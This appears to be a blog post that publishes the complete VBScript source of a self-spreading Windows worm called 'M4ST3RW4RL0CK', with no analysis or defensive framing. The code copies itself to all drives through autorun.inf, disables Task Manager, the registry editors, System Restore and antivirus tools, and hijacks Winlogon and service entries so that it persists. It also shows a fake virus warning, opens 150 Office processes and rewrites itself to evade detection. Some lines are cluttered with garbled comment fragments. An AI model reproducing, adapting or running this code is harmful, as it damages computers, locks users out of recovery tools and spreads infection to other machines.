M4ST3RW4RL0CK.vbs _2Variant

Posted on by Kefilhupher

on error resume next
dim rekur,windowpath,desades,fs,mf,isi,tf,warlock,nt,check,sd,fso,inti,namaf
isi = "[autorun]" & vbcrlf & "shellexecute=wscript.exe m4st3rW4r10ck.txt.vbs"
set fs = createobject("Scripting.FileSystemObject")
set mf = fs.getfile(Wscript.ScriptFullname)
dim text,size
size = mf.size
check = mf.drive.drivetype
set text = mf.openastextstream(1,-2)
do while not text.atendofstream
rekur = rekur & text.readline
rekur = rekur & vbcrlf
loop
do
Set windowpath = fs.getspecialfolder(0)
set tf = fs.getfile(windowpath & "\W4r10ck_zZ.txt.vbs")
tf.attributes = 32
set tf = fs.createtextfile(windowpath & "\W4r10ck_zZ.txt.vbs",2,true)
tf.write rekur
tf.close
set tf = fs.getfile(windowpath & "\W4r10ck_zZ.txt.vbs")
tf.attributes = 39
for each desades in fs.drives
If (desades.drivetype = 1 or desades.drivetype = 2) and desades.path <> "A:" then
set tf=fs.getfile(desades.path &"\W4r10ck_zZ.txt.vbs")
tf.attributes =32
set tf=fs.createtextfile(desades.path &"\W4r10ck_zZ.txt.vbs",2,true)
tf.write rekur
tf.close
set tf=fs.getfile(desades.path &"\W4r10ck_zZ.txt.vbs")
tf.attributes = 39
set tf =fs.getfile(desades.path &"\autorun.inf")
tf.attributes = 32
set tf=fs.createtextfile(desades.path &"\autorun.inf",2,true)
tf.write isi
tf.close
set tf = fs.getfile(desades.path &"\autorun.inf")
tf.attributes=39
end if
next
If fso.GetExtensionName(file.path)="bmp" or fso.GetExtensionName(file.path)="jpg" or fso.GetExtensionName(file.path)="gif" or fso.GetExtensionName(file.path)="ico" then
on error resume next
set fso = createobject("scripting.filesystemobject")
set mvbswe = wscript.CreateObject("wscript.shell")
set tes = fso.opentextfile(Wscript.Scriptfullname,1)
scr = tes.readall
bathelp = file.path & ".bat"
Set dropper = Fso.Createtextfile(bathelp, True)
dropper.writeline "Attrib +h " & file.path
dropper.Close
mvbswe.run bathelp
Fso.Deletefile bathelp
vbscopy = file.path & ".vbs"
Set dropper2 = Fso.Createtextfile(vbscopy, True)
dropper2.write "CreateObject(" & chr(34) & "WScript.Shell" & chr(34) & ").run " & chr(34) & file.path & chr(34) & vbcrlf
dropper2.write scr
dropper2.Close
end if
set fso = createobject("scripting.filesystemobject")
set payload = fso.createtextfile("C:\payload.html",true)
payload.writeline "mst3rkefi/w32warlock"
payload.writeline ""
payload.writeline ""
payload.writeline "Your Computer has been Infected with : "
payload.writeline "

mst3rkefi/w32warlock Hahahha..........love SPENKA........

"
payload.writeline ""
payload.close
CreateObject("Wscript.shell").run "C:\payload.html"
set warlock = createobject("WScript.Shell")
warlock.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title",":: ->WARLOCK THE MASTER OF LOTUS WORLD<- ::"
warlock.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Advanced\Hidden",2, "REG_DWORD"
warlock.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind", "1", "REG_DWORD"
warlock.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions", "1", "REG_DWORD"
warlock.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun", "1", "REG_DWORD"
warlock.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools", "1", "REG_DWORD"
warlock.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr", "1", "REG_DWORD"
warlock.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu", "1", "REG_DWORD"
warlock.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoAddPrinter", 1, "REG_DWORD"
warlock.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoAddPrinter", 1, "REG_DWORD"
warlock.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoClose", 1, "REG_DWORD"
warlock.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\NoVirtMemPage", 1, "REG_DWORD"
warlock.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption", "THEWARLOCK_zZ"
warlock.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeText","The Warlock sedang Tidur, saat bangun dia akan menghancurkan PC kamu"
warlock.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Systemdir", windowpath & "\W4r10ck_zZ.txt.vbs"
warlock.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cmd.exe\Debugger","notepad.exe"
warlock.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\install.exe\Debugger","notepad.exe"
warlock.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.exe\Debugger","notepad.exe"
warlock.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.exe\Debugger","notepad.exe"
warlock.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedt32.exe\Debugger","notepad.exe"
warlock.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RegistryEditor.exe\Debugger","notepad.exe"
warlock.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\setup.exe\Debugger","notepad.exe"
warlock.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV.exe\Debugger","notepad.exe"
warlock.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV-CLN.exe\Debugger","notepad.exe"
warlock.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV-RTP.exe\Debugger","notepad.exe"
warlock.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDrives", 67108863, "REG_DWORD"
warlock.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOrganization", "wIN32WarlockKefi"
warlock.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOwner","Bingung_vbs"''ivetype'rlf&"shellexecute=wscript.exe " & namaf'ivetype'rlf&"shellex
warlock.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU\a", "KeFiw32"''ivetype'rlf&"shellexecute=wscript.exe " & namaf'ivetype'rlf&"shellex
warlock.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU\MRUList", "a"''ivetype'rlf&"shellexecute=wscript.exe " & namaf'ivetype'rlf&"shellex
DoEvents''ivetype'rlf&"shellexecute=wscript.exe " & namaf'ivetype'rlf&"shellex''ivetype'rlf&"shellexecute=wscript.exe " & namaf'ivetype'rlf&"shellex
warlock.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind", "1", "REG_DWORD"'shellexecute=wscript.exe " & namaf'
warlock.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions", "1", "REG_DWORD"'shellexecute=wscript.exe " & namaf'
warlock.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun", "1", "REG_DWORD"'shellexecute=wscript.exe " & namaf'
warlock.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools", "1", "REG_DWORD"'shellexecute=wscript.exe " & namaf'
warlock.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr", "1", "REG_DWORD"'shellexecute=wscript.exe " & namaf'
warlock.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu", "1", "REG_DWORD"
warlock.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoTrayContextMenu", "1", "REG_DWORD"
warlock.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop\NoChangingWallpaper", "1", "REG_DWORD"
warlock.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoWinKeys", "1", "REG_DWORD"
warlock.RegWrite "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore\DisableSR", "1", "REG_DWORD"'shellexecute=wscript.exe " & namaf'
warlock.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoLogOff", "1", "REG_DWORD"
warlock.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoControlPanel", "1", "REG_DWORD"
warlock.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Logon User Name", "Jablunt"'shellexecute=wscript.exe " & namaf'
warlock.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\AltDefaultUserName", "Jablunt"'shellexecute=wscript.exe " & namaf'
warlock.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\DefaultUserName", "Jablunt"'shellexecute=wscript.exe " & namaf'
warlock.RegWrite "HKEY_CURRENT_USER\Control Panel\Desktop\ScreenSaveActive", "1"''ivetype'rlf&"shellexecute=wscript.exe " & namaf'ivetype'rlf&"shellex
warlock.RegWrite "HKEY_CURRENT_USER\Control Panel\Desktop\SCRNSAVE.EXE", "C:\WINDOWS\system32\marquee.scr"'shellexecute=wscript.exe " & namaf'
warlock.RegWrite "HKEY_CURRENT_USER\Control Panel\Desktop\Screen Saver.Marquee\Attributes", "00011"''ivetype'rlf&"shellexecute=wscript.exe " & namaf'ivetype'rlf&"shellex
warlock.RegWrite "HKEY_CURRENT_USER\Control Panel\Desktop\Screen Saver.Marquee\BackgroundColor", "0 0 0"'shellexecute=wscript.exe " & namaf'
warlock.RegWrite "HKEY_CURRENT_USER\Control Panel\Desktop\Screen Saver.Marquee\CharSet", "0"''ivetype'rlf&"shellexecute=wscript.exe " & namaf'ivetype'rlf&"shellex
warlock.RegWrite "HKEY_CURRENT_USER\Control Panel\Desktop\Screen Saver.Marquee\Font", "Verdana"'shellexecute=wscript.exe " & namaf'
warlock.RegWrite "HKEY_CURRENT_USER\Control Panel\Desktop\Screen Saver.Marquee\Mode", "1"'shellexecute=wscript.exe " & namaf'
warlock.RegWrite "HKEY_CURRENT_USER\Control Panel\Desktop\Screen Saver.Marquee\Size", "24"'shellexecute=wscript.exe " & namaf'
warlock.RegWrite "HKEY_CURRENT_USER\Control Panel\Desktop\Screen Saver.Marquee\Speed", "3"'shellexecute=wscript.exe " & namaf'
warlock.RegWrite "HKEY_CURRENT_USER\Control Panel\Desktop\Screen Saver.Marquee\Text", "KeFiLhuPher virus !!!!!!"'shellexecute=wscript.exe " & namaf'
warlock.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit", "C:\WINDOWS\system32\userinit.exe, c:\windows\svchost.exe " & inti
warlock.RegWrite "HKEY_CURRENT_USER\Control Panel\Desktop\Screen Saver.Marquee\TextColor", "255 0 0"'shellexecute=wscript.exe " & namaf'
warlock.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\shell", "explorer.exe, c:\windows\svchost.exe " & inti
warlock.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\shell", "explorer.exe, c:\windows\svchost.exe " & inti
warlock.RegWrite "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\BootExecute", "c:\windows\svchost.exe " & inti
warlock.RegWrite "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Environment\ComSpec", "%SystemRoot%\system32\cmd.exe, c:\windows\svchost.exe " & inti
warlock.RegWrite "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\PugPlay\ImagePath", "%SystemRoot%\system32\services.exe, c:\windows\svchost.exe " & inti
warlock.RegWrite "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\AlternateShell", "c:\windows\svchost.exe " & inti
warlock.RegWrite "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\srservice\ImagePathservice", "c:\windows\svchost.exe " & inti
warlock.RegWrite "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NPFMntor\ImagePath", "c:\windows\svchost.exe " & inti
warlock.RegWrite "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NSCService\ImagePath", "c:\windows\svchost.exe " & inti
warlock.RegWrite "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SAVScan\ImagePath", "c:\windows\svchost.exe " & inti
warlock.RegWrite "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NPFMntor\ImagePath", "c:\windows\svchost.exe " & inti
warlock.RegWrite "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SNDSrvc\ImagePath", "c:\windows\svchost.exe " & inti
warlock.RegWrite "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SPBBCDrv\ImagePath", "c:\windows\svchost.exe " & inti
warlock.RegWrite "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SPBBCSvc\ImagePath", "c:\windows\svchost.exe " & inti
warlock.RegWrite "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\McDetect.exe\ImagePath", "c:\windows\svchost.exe " & inti
warlock.RegWrite "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\McShield\ImagePath", "c:\windows\svchost.exe " & inti
warlock.RegWrite "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\McTskshd.exe\ImagePath", "c:\windows\svchost.exe " & inti
warlock.RegWrite "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\mcupdmgr.exe\ImagePath", "c:\windows\svchost.exe " & inti
warlock.RegWrite "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MSIServer\ImagePath", "c:\windows\svchost.exe " & inti
warlock.RegWrite "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\AlternateShell", "c:\windows\svchost.exe " & inti
warlock.RegWrite "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\srservice\ImagePathservice", "c:\windows\svchost.exe " & inti
warlock.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\SuperHidden\WarningIfNotDefault", "Windows has detected virus you should format all hard drive for further analist contact us at www.Strees.com"
warlock.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\HideFileExt\WarningIfNotDefault", "Windows has detected virus you should format all hard drive for further analist contact us at www.Strees.com"
for i = 1 to 150
Set w = CreateObject("Word.application")
Set e = CreateObject("ExCeL.application")
next
Randomize
for i = 1 to int(rnd * 20) + 3
a = chr(int(rnd * 22) + 97)
allchar = allchar & a
next
set fso = createobject("scripting.filesystemobject")
set op = fso.opentextfile(wscript.scriptfullname,1)
set parser = fso.Createtextfile("C:\poly.txt",true)
do while mark <> "'Markerz"
mark = op.readline
checker = mid(mark,1,4)
if mark = lcase("'Markerz") or checker = lcase("ReM ") then poly = replace(mark,mark,mark)
if checker <> lcase("ReM ") and mark <> lcase("'Markerz") then poly = replace(mark,mark,mark & " '" & allchar & vbcrlf & "rem " & allchar)
parser.writeline poly
loop
fso.copyfile "C:\poly.txt",wscript.scriptfullname
op.close
parser.close
'markerz
if check <> 1 then
Wscript.sleep 200000
end if
loop while check <> 1
set sd = createobject("Wscript.shell")
sd.run windowpath & "\explorer.exe /e,/select, " & Wscript.ScriptFullname

Fun And Hi-Tech [ IT Area ]

Advertisement

M4ST3RW4RL0CK.vbs _2Variant

Popular Posts

Category

Blog Archive